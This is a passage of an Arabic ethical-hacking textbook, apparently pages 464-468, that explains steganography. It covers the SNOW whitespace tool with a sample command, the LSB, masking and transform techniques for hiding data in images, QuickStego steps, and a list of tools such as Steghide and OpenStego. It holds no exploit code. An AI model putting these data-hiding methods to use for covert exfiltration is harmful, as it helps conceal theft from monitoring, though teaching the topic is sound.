‫ﺑرﻧﺎﻣﺞ ‪ SNOW‬ﯾﺳﺗﺧدم ﻹﺧﻔﺎء اﻟرﺳﺎﺋل ﻓﻲ ﻧص ‪ ASCII‬ﻣن ﺧﻼل ﺗﺿﻣﯾن اﻟﻣﺳﺎﻓﺎت اﻟﺑﯾﺿﺎء ﻓﻲ ﻧﮭﺎﯾﺔ اﻷﺳطر‪ .‬ﻷن اﻟﻣﺳﺎﻓﺎت وال‬
‫‪ TAB‬ﻋﻣوﻣﺎ ﻏﯾر ﻣرﺋﯾﺔ ﺑﺎﻟﻧﺳﺑﺔ ل‪ ، text viewer‬اﻟرﺳﺎﻟﺔ ﻓﻌﻠﯾﺎ ً ﺗﻛون ﻣﺧﻔﯾﮫ ﻋن اﻟﻣراﻗﺑﯾن اﻟﻌﺎدﯾﯾن‪ .‬إذا ﺗم اﺳﺗﺧدام اﻟﺗﺷﻔﯾر ﻓﻲ اﻟﺑﻧﺎء‪ ،‬ﻓﺎﻧﮫ‬
‫ﻻ ﯾﻣﻛن ﻗراءة اﻟرﺳﺎﻟﺔ ﺣﺗﻰ وﻟو ﺗم اﻛﺗﺷﺎﻓﮭﺎ‪.‬‬

‫ﻟﻧﻔﻌل ذﻟك ﻧﻘوم ﺑﻔﺗﺢ ﺳطر اﻷواﻣر اﻟﺧﺎص ﺑﺎﻟوﯾﻧدوز )‪ (cmd‬ﺛم اﻻﻧﺗﻘﺎل اﻟﻰ اﻟﻣﺟﻠد اﻟذي ﯾﺣﺗوي ﻋﻠﻰ اﻟﺗطﺑﯾﻖ ‪.snow‬‬ ‫‪-‬‬
‫ﻧﻘوم ﺑﻛﺗﺎﺑﺔ رﺳﺎﻟﺔ ﻣﺎ وﻧﻛﺗب ﺑﮭﺎ ﻣﺛﻼ ‪ Hello world‬ﺛم ﻧﻘوم ﺑﺣﻔظﮭﺎ ﺑﺎﺳم ‪ readme.txt‬ﻛﺎﻻﺗﻰ‪:‬‬ ‫‪-‬‬

‫ﻧﻘوم ﺑطﺑﺎﻋﺔ اﻻﻣر اﻟﺗﺎﻟﻲ ﻓﻲ ﺳطر اﻷواﻣر ﻛﺎﻻﺗﻰ‪:‬‬ ‫‪-‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪464‬‬

‫وﯾﻛون ﻛﺎﻻﺗﻰ‪:‬‬ ‫‪-‬‬

‫ھﻧﺎ ﺣﯾث ﻗﻣﻧﺎ ﺑﺈﺧﻔﺎء اﻟرﺳﺎﻟﺔ واﻟﺗﻲ ھﯾﺎ ‪ My swiss bank account number is 45656684512263‬ﻓﻲ ﻣﻠف اﻟﻧﺻﻲ‬ ‫‪-‬‬
‫‪ readme.txt‬ﺛم ﻗﻣﻧﺎ ﺑﺈﻧﺷﺎء ﻣﻠف ﺟدﯾد ‪ readme2.txt‬واﻟذي ﯾﺣﺗوي ھذا اﻟﻣﻠف ﻋﻠﻰ اﻟﻣﺣﺗوى اﻟﻣوﺟود ﺑداﺧل اﻟﻣﻠف‬
‫‪ readme.txt‬ﺑﺎﻹﺿﺎﻓﺔ اﻟﻰ اﻟرﺳﺎﻟﺔ اﻟﻣﺷﻔرة واﺳﺗﺧداﻣﻧﺎ أﯾﺿﺎ رﻗم ﺳرى واﻟذي ﻣن ﺣﻼﻟﮫ ﯾﺗﯾﺢ اﻻطﻼع ﻋﻠﻰ اﻟرﺳﺎﻟﺔ‪.‬‬
‫ﻟرؤﯾﺔ ﻣﺣﺗوى اﻟرﺳﺎﻟﺔ اﻟﻣﺧﻔﺎة ﻣرة أﺧرى ﻧﺳﺗﺧدم اﻻﺗﻲ‪:‬‬ ‫‪-‬‬
‫‪Snow –C –p “magic” readme2.txt‬‬

‫ﻟﻔﺣص اﻟﻣﻠف ﻓﻲ ‪ GUI‬ﻧﻘوم ﺑﻔﺗﺢ اﻟﻣﻠف ‪ readme2.txt‬ﺑﺎﻟﻣﺣرر ‪ notepad‬ﺛم ﻧﺧﺗﺎر ‪ Edit  Select all‬ﺣﯾث ﻧرى‬ ‫‪-‬‬
‫اﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ ﻋﻠﻰ ھﯾﺋﺔ ﻣﺳﺎﻓﺎت و ‪.TABS‬‬

‫‪Image Steganography‬‬
‫ﻣﻘﺪﻣﮫ‬

‫‪ Image steganography‬ﯾﺳﻣﺢ ﻟك ﺑﺈﺧﻔﺎء اﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ اﻟﺧﺎﺻﺔ ﺑك داﺧل ﺻورة‪ .‬ﺣﯾث ﯾﻣﻛﻧك اﻻﺳﺗﻔﺎدة ﻣن اﻟﺑت اﻟزاﺋدة ﻋن اﻟﺣﺎﺟﺔ‬
‫ﻟﻠﺻورة ﻹﺧﻔﺎء اﻟرﺳﺎﻟﺔ ﺑداﺧﻠﮭﺎ‪ .‬اﻟﺑﺗﺎت ‪ bits‬اﻟزاﺋدة ﺗﻠك اﻟﺗﻲ ﻓﻲ اﻟﺻورة ﻟﮭﺎ ﺗﺄﺛﯾر ﺿﺋﯾل ﺟدا ً ﻋﻠﻰ اﻟﺻورة إذا ﺣدث ﺗﻐﯾر ﻟﮭﺎ‪ .‬اﻟﺗﻌدﯾﻼت‬
‫ﻋﻠﻰ اﻟﺑﺗﺎت ﻻ ﯾﺗم اﻟﻛﺷف ﻋﻧﮭﺎ ﺑﺳﮭوﻟﮫ‪ .‬ﯾﻣﻛﻧك إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺧﺎﺻﺔ ﺑك داﺧل اﻟﺻور ﻓﻲ ﺗﻧﺳﯾﻘﺎت ﻣﺧﺗﻠﻔﺔ ﻣﺛل ‪ PNG‬و‪ JPG‬و‪BMP‬‬
‫وﻏﯾرھﺎ ﻣن ﺗﻧﺳﯾﻘﺎت اﻟﺻور اﻷﺧرى‪.‬‬
‫اﻟﺻور ﺗﻌﺗﺑر ﻣن أﻛﺛر اﻷدوات ﺷﻌﺑﯾﮫ اﻟﻣﺳﺗﺧدﻣﺔ ﻛﻐطﺎء ﻹﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﺑداﺧﻠﮭﺎ‪ .‬اﻷدوات اﻟﻣﺳﺗﺧدﻣﺔ ﻹﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﺑداﺧل اﻟﺻور‬
‫ﺗﺳﺗﺧدم اﻟﺑت اﻟزاﺋدة ﻋن اﻟﺣﺎﺟﺔ ﻣن ﺑﯾﺎﻧﺎت اﻟﺻورة ﻟﺗﺣل ﻣﺣﻠﮭﺎ اﻟرﺳﺎﻟﺔ اﻟﻣراد إﺧﻔﺎﺋﮭﺎ ﺑطرﯾﻘﺔ ﺑﺣﯾث ﯾﻛون ﺗﺄﺛﯾرھﺎ ﻻ ﯾﻣﻛن ﻛﺷﻔﮫ ﺑﺎﻟﻌﯾن‬
‫اﻟﺑﺷرﯾﺔ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪465‬‬

‫ﺗﻘﻧﯾﺎت إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اداﺧل ﻟﺻورة )‪ (Image Steganography Technique‬ﯾﻣﻛن ﺗﻘﺳﯾﻣﮭﺎ إﻟﻰ ﻣﺟﻣوﻋﺗﯾن‪Image domain :‬‬
‫و‪.transform domain‬‬
‫‪ -‬ﻓﻲ ﺗﻘﻧﯾﺔ ‪ ،Image (spatial) domain‬اﻟرﺳﺎﻟﺔ ﯾﺗم ﺗﺿﻣﯾﻧﮭﺎ ﻣﺑﺎﺷرة ﻓﻲ ﻛﺛﺎﻓﺔ ﺑﻛﺳل)‪. (intensity of the pixels‬‬
‫‪ -‬ﻓﻲ ﺗﻘﻧﯾﺎت )‪ ،transform domain (frequency‬ﯾﺗم ﺗﺣوﯾل اﻟﺻور أوﻻً ﺛم ﯾﺗم ﺗﺿﻣﯾن اﻟرﺳﺎﻟﺔ ﻓﻲ اﻟﺻورة‪.‬‬
‫ھﻧﺎك ﺛﻼﺛﺔ أﺳﺎﻟﯾب اﻟﺗﻲ ﯾﻣﻛﻧك اﺳﺗﺧداﻣﮭﺎ ﻹﺧﻔﺎء اﻟرﺳﺎﺋل اﻟﺳرﯾﺔ ﻓﻲ ﻣﻠﻔﺎت اﻟﺻور ‪:‬‬
‫‪ -‬اﻟﺗﺿﻣﯾن ﺑدﻻ ﻣن اﻟﺑﺗﺎت اﻟﻣﮭﻣﻠﺔ )‪.(Least Significant Bit Insertion‬‬
‫‪ -‬اﻟﺗﻘﻧﻊ واﻟﻔﻠﺗرة )‪.(Masking and Filtering‬‬
‫‪ -‬اﻟﺧوارزﻣﯾﺎت واﻟﺗﺣول )‪.(Algorithms and Transformation‬‬

‫‪Least Significant Bit Insertion -1‬‬

‫‪ The Least Significant Bit Insertion technique‬ھو ﻣن أﻛﺛر اﻟﺗﻘﻧﯾﺎت اﻟﻣﺳﺗﺧدﻣﺔ ﻹﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﺑداﺧل اﻟﺻور وذﻟك ﻣن‬
‫ﺧﻼل اﺳﺗﺧدام اﻗل ﺑﯾت ﻣﮭﻣل ])‪ [Least Significant Bit (LSB‬ﻟﻛل ﺑﻛﺳل ﻟﻼﺣﺗﻔﺎظ ﺑﺎﻟﺑﯾﺎﻧﺎت اﻟﺳرﯾﺔ اﻟﺧﺎﺻﺔ ﺑك‪ LSB .‬ھو اﻟﺑت‬
‫اﻟﻣوﺟود ﻓﻲ أﻗﺻﻰ اﻟﯾﻣﯾن ﻣن ﻛل ﺑﻛﺳل ﻣن ﻣﻠف اﻟﺻورة‪ LSB .‬ھذا‪ ،‬إذا ﺗﻐﯾرت‪ ،‬ﻟﮫ ﺗﺄﺛﯾر ﺿﺋﯾل ﺟدا ً ﻋﻠﻰ اﻟﺻورة؛ ﻻ ﯾﻣﻛن اﻟﻛﺷف ﻋﻧﮭﺎ‪.‬‬
‫ﻹﺧﻔﺎء اﻟرﺳﺎﻟﺔ‪ ،‬ﯾﺟب أوﻻً ﻛﺳر اﻟرﺳﺎﻟﺔ وإدراج ﻛل ﺑت ﻣﻛﺎن ‪ LSB‬ﻟﻛل ﺑﻛﺳل ﻣن اﻟﺻورة ﺑﺣﯾث ﯾﻣﻛن ﻟﻠﻣﺗﻠﻘﻲ ﻓﻲ اﻟﻧﮭﺎﯾﺔ اﺳﺗرداد اﻟرﺳﺎﻟﺔ‬
‫اﻟﺧﺎﺻﺔ ﺑك ﺑﻛل ﺳﮭوﻟﺔ‪.‬‬
‫ﻧﻔﺗرض أﻧك ﻗد اﺧﺗرت ﺻورة ‪ 24‬ﺑت ﻹﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت اﻟﺳرﯾﺔ اﻟﺧﺎﺻﺔ ﺑك‪ ،‬واﻟﺗﻲ ﯾﻣﻛن ان ﺗﻛون ﻣﻣﺛﻠﺔ ﻓﻲ ﺷﻛل رﻗﻣﻲ ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‪:‬‬
‫)‪(00100111 11101001 11001000) (00100111 11001000 11101001) (11001000 00100111 11101001‬‬
‫وﺗرﯾد إﺧﻔﺎء ﺣرف "‪ "H‬ﻓﻲ اﻟﺻورة أﻋﻼه ‪ 24‬ﺑت ﻛﻣﺎ ﯾﻠﻲ‪.‬‬
‫اﻵن ﺣرف "‪ "H‬ﯾﻣﺛﻠﮫ اﻷرﻗﺎم اﻟﺛﻧﺎﺋﯾﺔ ‪ 01001000‬ﻹﺧﻔﺎء ھذا "‪ ،"H‬ﯾﻣﻛﻧك ﺗﻐﯾر اﻟﺗﯾﺎر اﻟﺳﺎﺑﻖ إﻟﻰ اﻻﺗﻲ‪:‬‬

‫ﺣﯾث إﻧك ﻓﻘط ﺳوف ﺗﺣﺗﺎج اﻟﻰ اﺳﺗﺑدال ‪ LSB‬ﻣن ﻛل ﺑﻛﺳل ﻣن ﻣﻠف اﻟﺻورة ﻛﻣﺎ ھو ﻣﺑﯾن ﻓﻲ ھذا اﻟﺷﻛل‪.‬‬
‫ﻻﺳﺗرداد ھذا ‪ H‬ﻓﻲ اﻟﺟﺎﻧب اﻵﺧر‪ ،‬ﻓﺈن اﻟﺷﺧص ﻓﻲ اﻟﺟﺎﻧب اﻟﻣﺗﻠﻘﻲ ﯾﻘوم ﺑﺗﺟﻣﯾﻊ ﻛل ‪ LSB‬ﺑت ﻣن ﻣﻠف اﻟﺻورة وﺑﺎﻟﺗﺎﻟﻲ ﻓﮭو ﻗﺎدر ﻋﻠﻰ‬
‫اﻟﻛﺷف ﻋن ‪ H‬ﻓﻲ اﻟﺟﺎﻧب اﻟﻣﺗﻠﻘﻲ‪.‬‬
‫‪Masking and Filtering -2‬‬
‫‪ Masking and filtering techniques‬ﺗﺳﺗﻔﯾد ﻣن اﻟﻘدرات اﻟﺑﺻرﯾﺔ ﻟﻺﻧﺳﺎن اﻟﺗﻲ ﻻ ﯾﻣﻛﻧﮭﺎ اﻟﻛﺷف ﻋن اﻟﺗﻐﯾﯾرات اﻟطﻔﯾﻔﺔ ﻓﻲ ﺻوره‬
‫ﻣﻌﯾﻧﺔ‪ .‬ﯾﻣﻛن ﻟﻠﺻور اﻟرﻣﺎدﯾﺔ )‪ (Grayscale images‬إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﺑطرﯾﻘﺔ ﻣﺷﺎﺑﮭﺔ ﻟﻠﻌﻼﻣﺎت اﻟﻣﺎﺋﯾﺔ ﻋﻠﻰ اﻟورق‪ ،‬وﺗﺳﺗﺧدم ﻓﻲ ﺑﻌض‬
‫اﻷﺣﯾﺎن ﻛﺄﻧﮭﺎ ﻋﻼﻣﺎت ﻣﺎﺋﯾﺔ رﻗﻣﯾﺔ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪466‬‬

‫‪ The masking technique‬ﯾﺳﻣﺢ ﻟك ﺑﺈﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت اﻟﺳرﯾﺔ اﻟﺧﺎﺻﺔ ﺑك ﻋن طرﯾﻖ وﺿﻌﮭﺎ ﻓﻲ ﻣﻠف اﻟﺻور‪ .‬ﻛل ﻣن ﺗﻘﻧﯾﺎت‬
‫‪) Masking‬اﻟﺗﻘﻧﻊ( و‪ filtering‬ﺗﺳﺗﺧدم ﻓﻲ اﻟﻐﺎﻟب ﻓﻲ ‪-24‬ﺑت‪-‬ﻟﻛل‪-‬ﺑﻛﺳل ﻓﻲ اﻟﺻور واﻟﺻور اﻟرﻣﺎدﯾﺔ‪ .‬ﻹﺧﻔﺎء اﻟرﺳﺎﺋل اﻟﺳرﯾﺔ‪ ،‬ﻓﺎﻧت‬
‫ﺑﺣﺎﺟﺔ اﻟﻰ ﺿﺑط اﻹﺿﺎءة واﻟﺗﻌﺗﯾم ﻟﻠﺻورة‪ .‬إذا ﻛﺎن اﻟﺗﻐﯾﯾر ﻓﻲ اﻹﻧﺎرة ﺻﻐﯾر‪ ،‬ﻓﺎن اﻟﻣﺳﺗﺧدﻣﯾن ﻋدا اﻟﻣﺳﺗﺧدﻣﯾن اﻟﻣﺳﺗﮭدﻓﯾن ﻻ ﯾﻼﺣظون أن‬
‫اﻟﺻورة ﺗﺣﺗوي ﻋﻠﻰ رﺳﺎﻟﺔ ﺧﻔﯾﺔ‪ .‬ھذا اﻷﺳﻠوب ﯾﻣﻛن ﺑﺳﮭوﻟﺔ ﺗطﺑﯾﻘﮭﺎ ﻋﻠﻰ اﻟﺻورة ﻛﻣﺎ أﻧﮭﺎ ﻻ ﺗﺧل ﺑﺎﻟﺻورة‪ .‬ﺗﺳﺗﺧدم ﻓﻲ اﻟﻐﺎﻟب ﻣﻊ ﺻور‬
‫‪) Lossy JPEG .JPEG‬اﻟﺟزء اﻟﻣﮭﻣل ﻓﻲ اﻟﺻورة( ﺗﻛون ﻣﺣﺻﻧﺔ ﻧﺳﺑﯾﺎ ﻣن ﻋﻣﻠﯾﺎت اﻟزرع واﻟﺿﻐط ﻋﻠﻰ اﻟﺻور‪ .‬وﺑﺎﻟﺗﺎﻟﻲ‪ ،‬ﻓﺎن إﺧﻔﺎء‬
‫اﻟﻣﻌﻠوﻣﺎت ﻓﻲ اﻟﺟزء ‪ Lossy jpeg‬ﯾﺗم ﻏﺎﻟﺑﺎ ﺑﺎﺳﺗﺧدام ﺗﻘﻧﯾﺔ اﻟﺗﻘﻧﻊ )‪ .(Masking technique‬اﻟﺳﺑب ﻓﻲ ذﻟك ان ‪Steganography Image‬‬
‫ﯾﻘوم ﺑﺎﻟﺗﺷﻔﯾر ﺑواﺳطﺔ وﺿﻊ ﻋﻼﻣﺎت ﻓﻲ ﻣﻌدل ﻣﻧﺧﻔض ﻋﻧد ﺿﻐط ‪ JPEG‬واﻟذي ﺗﻛون ﻓﯾﮫ اﻟرﺳﺎﻟﺔ ﻣﺧﺑﺄه ﻓﻲ ﻣﻧطﻘﮫ ﺧﺎﺻﮫ ﻣن اﻟﺻورة‪.‬‬

‫‪Algorithms and Transformation -3‬‬


‫‪ The algorithms and transformation technique‬ﯾﻌﺗﻣد ﻋﻠﻰ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ ﻣن ﺧﻼل ﺿﻐط اﻟﺻورة‪ .‬ﻓﻲ ھذه‬
‫اﻟﺗﻘﻧﯾﺔ‪ ،‬ﯾﺗم إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﻓﻲ اﻟﺻورة ﻣن ﺧﻼل ﺗطﺑﯾﻖ ﺧوارزﻣﯾﺎت اﻟﺿﻐط اﻟﻣﺧﺗﻠﻔﺔ ووظﺎﺋف اﻟﺗﺣول)‪. (Transformation function‬‬
‫ﺧوارزﻣﯾﺔ اﻟﺿﻐط واﻟﺗﺣول ﯾﺳﺗﺧدم داﻟﺔ رﯾﺎﺿﯾﺔ ﻹﺧﻔﺎء ﻣﻌﺎﻣل أﻗل ﻗﻠﯾﻼ أﺛﻧﺎء ﺿﻐط اﻟﺻور‪ .‬ﻋﻣوﻣﺎ اﻟﺻور ‪ JPEG‬ھﻲ ﻣﻧﺎﺳﺑﺔ ﻷداء‬
‫ﻋﻣﻠﯾﺔ اﻟﺿﻐط ﻛﻣﺎ ﯾﻣﻛن ﺣﻔظﮭﺎ ﻓﻲ ﻣﺳﺗوﯾﺎت ﺿﻐط ﻣﺧﺗﻠﻔﺔ‪ .‬ھذا اﻷﺳﻠوب ﯾوﻓر ﻟك ﻣﺳﺗوى ﻋﺎل ﻣن إﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت اﻟﺳرﯾﺔ‪ .‬ﺻور ‪JPEG‬‬
‫ﺗﺳﺗﺧدم ‪ cosine‬ﻣﻧﻔﺻﻠﺔ ﻟﺗﺣﻘﯾﻖ ﻋﻣﻠﯾﺔ اﻟﺿﻐط‪.‬‬
‫ھﻧﺎك ﺛﻼﺛﺔ أﻧواع ﻣن ﺗﻘﻧﯾﺎت اﻟﺗﺣول اﻟﻣﺳﺗﺧدﻣﺔ ﻓﻲ ﺧوارزﻣﯾﺔ ﺿﻐط‪:‬‬
‫‪Fast Fourier transformation -‬‬
‫‪Discrete cosine transformation -‬‬
‫‪Wavelet transformation -‬‬
‫‪Image Steganography: Quickstego‬‬

‫اﻟﻣﺻدر‪http://quickcrypto.com :‬‬
‫‪Quickstego‬ﯾﺗﯾﺢ ﻟك اﺧﻔﺎء اﻟرﺳﺎﺋل اﻟﺳرﯾﺔ ﻓﻲ اﻟﺻور ﺑﺣﯾث ﯾﻣﻛن ﻓﻘط ﻟﻣﺳﺗﺧدﻣﻲ‪ Quickstego‬ﻣن اﺳﺗرداد وﻗراءة اﻟرﺳﺎﺋل اﻟﺳرﯾﺔ‬
‫اﻟﻣﺧﻔﯾﺔ‪ .‬ﺑﻣﺟرد إﺧﻔﺎء اﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ ﻓﻲ اﻟﺻورة‪ ،‬ﻻ ﯾزال ﺑﺈﻣﻛﺎﻧك ﺣﻔظﮫ ﻛﻣﻠف اﻟﺻورة؛ ﻓﺈﻧﮫ ﺳﯾﺗم ﺗﺣﻣﯾل ﺗﻣﺎﻣﺎ ﻣﺛل أي ﺻورة أﺧرى‪،‬‬
‫وﯾﺑدو ﻛﻣﺎ ﻓﻌﻠت ﻣن ﻗﺑل‪ .‬ﯾﻣﻛن ﺣﻔظ اﻟﺻورة‪ ،‬ﻋﺑر اﻟﺑرﯾد اﻻﻟﻛﺗروﻧﻲ‪ ،‬وﺗﺣﻣﯾﻠﮭﺎ ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت ﻛﻣﺎ ﻛﺎن ﻣن ﻗﺑل‪ ،‬واﻟﻔرق اﻟوﺣﯾد‬
‫ﺳﯾﻛون أﻧﮫ ﯾﺣﺗوي ﻋﻠﻰ رﺳﺎﻟﺔ ﺧﻔﯾﺔ‪.‬‬
‫‪ Quickstego‬ﯾﻐﯾر ﺑﺻورة ﺗدرﯾﺟﯾﺔ ﺑﻛﺳل )ﻋﻧﺎﺻر اﻟﺻورة اﻟﻔردﯾﺔ( ﻣن اﻟﺻورة‪ ،‬ﺗﺷﻔﯾر اﻟﻧص اﻟﺳري ﺑﺈﺿﺎﻓﺔ اﺧﺗﻼﻓﺎت ﺻﻐﯾرة ﻓﻲ ﻟون‬
‫اﻟﺻورة‪ .‬ﻓﻲ اﻟﻣﻣﺎرﺳﺔ اﻟﻌﻣﻠﯾﺔ‪ ،‬ﺑﺎﻟﻧﺳﺑﺔ ﻟﻠﻌﯾن اﻟﺑﺷرﯾﺔ‪ ،‬ﻻ ﺗظﮭر ھذه اﻟﺧﻼﻓﺎت اﻟﺻﻐﯾرة ﻟﺗﻐﯾﯾر اﻟﺻورة‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪467‬‬

‫طرﯾﻘﺔ اﻟﻌﻣل‪:‬‬
‫‪ -‬ﻧﻘوم ﺑﺎﻟﺗﺛﺑﯾت ﻣن ﺧﻼل اﺗﺑﺎع ‪ Wizard‬ﺛم ﻧﻘوم ﺑﺗﺷﻐﯾل اﻟﺑرﻧﺎﻣﺞ ﻣن ﺧﻼل اﻟﻧﻘر اﻟﻣزدوج ﻓوﻗﮫ واﻟﺗﻲ ﺗؤدى اﻟﻰ ظﮭور اﻻﺗﻲ‪:‬‬

‫ﻧﺟد اﻧﮫ ﯾﺣﺗوي ﻋﻠﻰ ﻣﺟﻣوع ﻣن اﻷدوات ﻧﻘوم أوﻻ ﺑﺎﻟﻧﻘر ﻓوق ‪ Open Image‬ﻟﻧﻘوم ﻣن ﺧﻼل اﺧﺗﯾﺎر اﻟﺻورة اﻟﺗﻲ ﺳوف‬ ‫‪-‬‬
‫ﻧﺳﺗﺧدﻣﮭﺎ ﻛﻐطﺎء ﻹﺧﻔﺎء اﻟﻧص اﻟﺳري‪.‬‬
‫ﻧﻼﺣظ ﺑﻌد اﺧﺗﯾﺎر اﻟﺻورة‪ ،‬إذا ﻛﺎﻧت اﻟﺻورة ﺧﺎﻟﯾﮫ ﻣن أي ﻧص ﻣﺷﻔر ﺑواﺳطﺔ ھذا اﻟﺗطﺑﯾﻖ ﻓﮭذا ﺳوف ﯾؤدى اﻟﻰ ظﮭور اﻟرﺳﺎﻟﺔ‬ ‫‪-‬‬
‫اﻟﺗﺎﻟﯾﺔ ﻓﻲ أﺳﻔل ادوات اﺧﺗﯾﺎر اﻟﺻورة‪:‬‬
‫‪THIS IMAGE DOES NOT HAVE A QUICK STEGO SECRET TEXT MESSAGE.‬‬
‫ﺑﻌد اﺧﺗﯾﺎر اﻟﺻورة ﻧﻘوم ﺑﺎﻟﻧﻘر ﻓوق ‪ Open Text‬ﻻﺧﺗﯾﺎر اﻟﻧص اﻟذي ﻧرﯾد اﺧﻔﺎءه‪.‬‬ ‫‪-‬‬
‫اﻻن وﻗد اﺧﺗرﻧﺎ اﻟﺻور وأﯾﺿﺎ اﻟﻧص اﻟذي ﻧرﯾد اﺧﻔﺎﺋﮫ‪ ،‬ﻧﻘوم اﻻن ﺑﺎﻟﻧﻘر ﻓوق ‪ Hide Text‬واﻟذي ﯾﻘوم ﺑﺈﺧﻔﺎء اﻟﻧص ﺑداﺧل‬ ‫‪-‬‬
‫اﻟﺻورة‪.‬‬
‫ﻧﻼﺣظ أﯾﺿﺎ ﺑﺟﺎﻧب اﻟزر ‪ Hide Text‬وﺟود زر اﺧر وھو ‪ Get Text‬واﻟذي ﯾﻘوم ﺑﺄداء اﻟﻌﻛس ﺣﯾث ﯾﻘوم ﺑﺎﻟﺣﺻول ﻋﻠﻰ اﻟﻧص‬ ‫‪-‬‬
‫اﻟﻣﺧﻔﻲ ﻣن اﻟﺻورة‪.‬‬
‫ﺑﻌد إﺗﻣﺎم إﺧﻔﺎء اﻟﻧص ﻓﻲ اﻟﺻورة ﺗظﮭر اﻟرﺳﺎﻟﺔ )‪ (The text message is now hidden in image‬واﻟﺗﻲ ﺗﺧﺑرك ﺑﺈﻧﮭﺎء‬ ‫‪-‬‬
‫ﻋﻣﻠﯾﺔ اﻻﺧﻔﺎء‪.‬‬
‫اﻻن اﻟﻰ اﻟﺧطوة اﻷﺧﯾرة وﻓﯾﮭﺎ ﻧﻘوم ﺑﺣﻔظ اﻟﺻورة اﻟﺗﻲ ﺗﺣﺗوي ﻋﻠﻰ اﻟﻧص اﻟﻣﺷﻔر وذﻟك ﺑﺎﻟﻧﻘر ﻓوق ‪.Save Image‬‬ ‫‪-‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪468‬‬

‫‪Image Steganography Tools‬‬


‫ﻣﺛل اﻷداة ‪ Quickstego‬اﻟﺗﻲ ﻧﺎﻗﺷﻧﮭﺎ ﺳﺎﺑﻘﺎ‪ ،‬ﯾﻣﻛﻧك أﯾﺿﺎ اﺳﺗﺧدام أدوات إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﺑداﺧل اﻟﺻور اﻟﺗﺎﻟﯾﺔ ﻹﺧﻔﺎء اﻟرﺳﺎﺋل اﻟﺳرﯾﺔ‬
‫اﻟﺧﺎﺻﺔ ﺑك ﻓﻲ اﻟﺻور‪:‬‬
‫‪Hide in Picture available at http://sourceforge.net‬‬
‫‪CryptaPix available at http://www.briggsoft.com‬‬
‫‪BMPSecrets available at http://bmpsecrets.com‬‬
‫‪OpenPuff available at http://embeddedsw.net‬‬
‫‪Openstego available at http://openstego.sourceforge.net‬‬
‫‪PHP-Class Streamsteganography available at http://www.phpclasses.org‬‬
‫‪Red JPEG available at http://www.totalcmd.net‬‬
‫‪Steganography Studio available at http://stegstudio.sourceforge.net‬‬
‫‪Virtual Steganographic Laboratory (VSL) available at http://vsl.sourceforge.net‬‬
‫‪Image Steganography Tools for Linux‬‬
‫‪Steghide -1‬‬
‫اﻟﻣﺻدر‪http://steghide.sourceforge.net/download.php :‬‬
‫‪ Steghide‬ھو ﺑرﻧﺎﻣﺞ ﺳطر اﻷواﻣر ﻹﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ھﻲ ﻗﺎدرة ﻋﻠﻰ إﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت ﻓﻲ أﻧواع ﻣﺧﺗﻠﻔﺔ ﻣن ﺻورة واﻟﻣﻠﻔﺎت اﻟﺻوﺗﯾﺔ‪.‬‬
‫ﻻ ﯾﺗم ﺗﻐﯾﯾر اﻟﺗرددات وﻻ اﻻﻟوان ﻋﻠﻰ اﻟﺗواﻟﻲ ﻣﻣﺎ ﯾﺟﻌل اﻟﺗﺿﻣﯾن ﺿد اﻻﺧﺗﺑﺎرات اﻹﺣﺻﺎﺋﯾﺔ‪.‬‬
‫ﻟﺗﺿﻣﯾن اﻟﻧص ﻓﻲ اﻟﺻورة ﻛﺎﻻﺗﻰ‪:‬‬

‫ﻹﺧراج اﻟﻧص ﻣن اﻟﺻورة ﻛﺎﻻﺗﻰ‪:‬‬

‫‪Steg -2‬‬
‫اﻟﻣﺻدر‪https://steg.drupalgardens.com/stegdownload :‬‬
‫‪ Steg‬ھو ﻣﻧﺻﺔ ﺑرﻣﺟﯾﺎت ﻣﺣﻣوﻟﺔ‪ ،‬ﻛﺗب ﻓﻲ‪ . C + +‬ﺗﺳﺗﺧدم ﺗﻘﻧﯾﺎت إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت واﻟﺗﺷﻔﯾر ﻹﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت داﺧل اﻟﺻور ﺳواء اﻟﻐﯾر‬
